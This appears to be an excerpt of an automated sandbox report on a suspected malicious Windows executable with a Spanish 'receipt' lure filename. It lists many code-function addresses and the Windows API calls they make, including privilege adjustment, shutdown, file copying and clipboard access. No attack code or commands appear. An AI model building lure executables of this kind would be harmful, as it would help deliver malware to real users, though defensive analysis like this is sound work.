            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403348
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile created: C:\Windows\BehovsundersgelsesJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 0_2_004069450_2_00406945
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 0_2_0040711C0_2_0040711C
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 0_2_6FC41A980_2_6FC41A98
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_004069454_2_00406945
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_0040711C4_2_0040711C
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_0255D2784_2_0255D278
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_025553704_2_02555370
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_0255C1464_2_0255C146
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_0255C7384_2_0255C738
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_0255D5484_2_0255D548
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_0255CA084_2_0255CA08
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_0255E9884_2_0255E988
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_025569A04_2_025569A0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_02553E094_2_02553E09
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_02556FC84_2_02556FC8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_0255CFAA4_2_0255CFAA
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_0255CCD84_2_0255CCD8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_02559DE04_2_02559DE0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_02553AA14_2_02553AA1
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_02553B894_2_02553B89
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_0255E97A4_2_0255E97A
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_0255F9614_2_0255F961
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_025529EC4_2_025529EC
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EACDC04_2_35EACDC0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA51484_2_35EA5148
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA18504_2_35EA1850
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA1FA84_2_35EA1FA8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EADF204_2_35EADF20
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA2A904_2_35EA2A90
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA96684_2_35EA9668
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EACDBF4_2_35EACDBF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA89B14_2_35EA89B1
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA9D8F4_2_35EA9D8F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA9D904_2_35EA9D90
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA51424_2_35EA5142
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAF92F4_2_35EAF92F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAF9304_2_35EAF930
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA8CC04_2_35EA8CC0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAF4D84_2_35EAF4D8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA8CB14_2_35EA8CB1
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAF0804_2_35EAF080
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAF07F4_2_35EAF07F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA00404_2_35EA0040
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA18414_2_35EA1841
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAEC284_2_35EAEC28
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA00214_2_35EA0021
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAE7CF4_2_35EAE7CF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAE7D04_2_35EAE7D0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA1F9C4_2_35EA1F9C
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAE3784_2_35EAE378
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAE3774_2_35EAE377
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA0B204_2_35EA0B20
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA0B304_2_35EA0B30
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EADF1B4_2_35EADF1B
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EADAC84_2_35EADAC8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EADAC74_2_35EADAC7
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA2A804_2_35EA2A80
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAD6674_2_35EAD667
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAD6704_2_35EAD670
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA965F4_2_35EA965F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAD2184_2_35EAD218
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36097B784_2_36097B78
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36098FB04_2_36098FB0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609FC184_2_3609FC18
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360981D04_2_360981D0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36096A184_2_36096A18
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36096A134_2_36096A13
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360946174_2_36094617
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360946204_2_36094620
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36091A474_2_36091A47
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36091A504_2_36091A50
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609EE574_2_3609EE57
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36094A684_2_36094A68
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609EE684_2_3609EE68
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609CE674_2_3609CE67
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609CE784_2_3609CE78
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36094A784_2_36094A78
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36096E704_2_36096E70
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36096E724_2_36096E72
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36091E9F4_2_36091E9F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36091EA84_2_36091EA8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360972BF4_2_360972BF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360972C84_2_360972C8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36094EC04_2_36094EC0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36094ED04_2_36094ED0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609F2E74_2_3609F2E7
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609F2F84_2_3609F2F8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360922F74_2_360922F7
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609D2F74_2_3609D2F7
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609D3084_2_3609D308
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360923004_2_36092300
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609B3074_2_3609B307
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609B3184_2_3609B318
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609531F4_2_3609531F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360953284_2_36095328
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360977204_2_36097720
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360977224_2_36097722
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609274F4_2_3609274F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360927584_2_36092758
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609F7784_2_3609F778
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36097B774_2_36097B77
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609F7884_2_3609F788
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360957804_2_36095780
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609D7874_2_3609D787
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609D7984_2_3609D798
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609B7984_2_3609B798
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609B7A84_2_3609B7A8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36092BAF4_2_36092BAF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36098FA14_2_36098FA1
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36092BB04_2_36092BB0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36095BD84_2_36095BD8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36092FF94_2_36092FF9
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360930084_2_36093008
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609DC194_2_3609DC19
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609DC284_2_3609DC28
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609BC2B4_2_3609BC2B
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609602F4_2_3609602F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609BC384_2_3609BC38
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360960304_2_36096030
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360900374_2_36090037
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360900404_2_36090040
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609345F4_2_3609345F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360934604_2_36093460
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360964784_2_36096478
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360964884_2_36096488
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609048F4_2_3609048F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360904984_2_36090498
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360938A84_2_360938A8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609E0A74_2_3609E0A7
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609E0B84_2_3609E0B8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360938B84_2_360938B8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609C0B74_2_3609C0B7
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609C0C84_2_3609C0C8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360908E74_2_360908E7
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360908F04_2_360908F0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609A9284_2_3609A928
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609A9384_2_3609A938
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609E5384_2_3609E538
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36090D484_2_36090D48
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609E5484_2_3609E548
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609C5484_2_3609C548
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609C5584_2_3609C558
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360911A04_2_360911A0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609E9C84_2_3609E9C8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360981C04_2_360981C0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609E9D84_2_3609E9D8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609C9D84_2_3609C9D8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609C9E84_2_3609C9E8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360915EF4_2_360915EF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360915F84_2_360915F8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361017104_2_36101710
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361066784_2_36106678
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36109B104_2_36109B10
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361000124_2_36100012
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361029184_2_36102918
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610C6184_2_3610C618
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361052194_2_36105219
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361083194_2_36108319
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610F1194_2_3610F119
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610AE1F4_2_3610AE1F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610DE004_2_3610DE00
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361029074_2_36102907
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361049084_2_36104908
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361070084_2_36107008
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610C6084_2_3610C608
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361066094_2_36106609
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610AE304_2_3610AE30
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36106B304_2_36106B30
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361096374_2_36109637
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361032384_2_36103238
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610D9384_2_3610D938
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36105B394_2_36105B39
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610F1204_2_3610F120
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610D9274_2_3610D927
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361052284_2_36105228
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361083284_2_36108328
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610322F4_2_3610322F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610C1504_2_3610C150
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361009504_2_36100950
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36107E504_2_36107E50
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36103B584_2_36103B58
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610EC584_2_3610EC58
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610A9584_2_3610A958
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361000404_2_36100040
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36106B404_2_36106B40
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610C1434_2_3610C143
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36105B484_2_36105B48
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361096484_2_36109648
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610EC4D4_2_3610EC4D
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36103B4F4_2_36103B4F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610D4704_2_3610D470
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361012704_2_36101270
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361091714_2_36109171
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361066754_2_36106675
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361044784_2_36104478
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361024784_2_36102478
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610BC784_2_3610BC78
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610E77F4_2_3610E77F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361009604_2_36100960
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36107E604_2_36107E60
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610D4604_2_3610D460
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610A9684_2_3610A968
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361044684_2_36104468
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610E7904_2_3610E790
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36101B914_2_36101B91
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36104D984_2_36104D98
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361079984_2_36107998
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36102D9B4_2_36102D9B
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361012804_2_36101280
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361091804_2_36109180
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361024884_2_36102488
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610BC884_2_3610BC88
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361079884_2_36107988
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36104D894_2_36104D89
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610A48F4_2_3610A48F
